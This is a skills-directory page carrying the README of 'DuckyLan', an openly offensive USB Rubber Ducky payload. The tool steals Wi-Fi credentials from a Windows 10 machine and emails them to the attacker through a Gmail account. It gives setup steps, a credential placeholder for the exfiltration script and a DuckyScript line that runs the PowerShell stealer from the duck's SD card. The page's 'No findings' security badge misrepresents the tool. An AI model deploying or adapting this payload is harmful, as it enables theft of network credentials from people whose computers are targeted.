SkillAgentSearch skills...

DuckyLan

A USB RubberDucky payload that steals Wi-Fi credentials and sends them to the attacker via STMP

Install / Use

/learn @PrettyBoyCosmo/DuckyLan
About this skill

Quality Score

0/100

Supported Platforms

Universal

README

DuckyLan SMTP

Blue Cosmo


________                 __           .____                   
\______ \  __ __   ____ |  | _____.__.|    |   _____    ____  
 |    |  \|  |  \_/ ___\|  |/ <   |  ||    |   \__  \  /    \ 
 |    `   \  |  /\  \___|    < \___  ||    |___ / __ \|   |  \
/_______  /____/  \___  >__|_ \/ ____||_______ (____  /___|  /
        \/            \/     \/\/             \/    \/     \/

Overview:

A USB RubberDucky payload that steals Wi-Fi credentials and sends them to the attacker via STMP.

Resources:

Requirements:

  • Twin-Duck firmware
  • Gmail account
    • i suggest making a separate Gmail account for this payload
    • your Gmail must have LSA Access enabled
  • Windows 10 Target

Instructions:

Set-Up/Installation

  1. change Gmail credentials in p.ps1
# gmail credentials
$email = "example@gmail.com"
$password = "password"
  1. in line 15 of payload.txt, change 'W' to the name of your ducky [SD Card]
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name;./p.ps1;exit
  1. flash Twin-Duck firmware on to your duck
  2. load, encode, and deploy!!

#projects #malware

View on GitHub
GitHub Stars10
CategoryDevelopment
Updated1y ago
Forks1

Languages

PowerShell

Security Score

65/100

Audited on Mar 22, 2025

No findings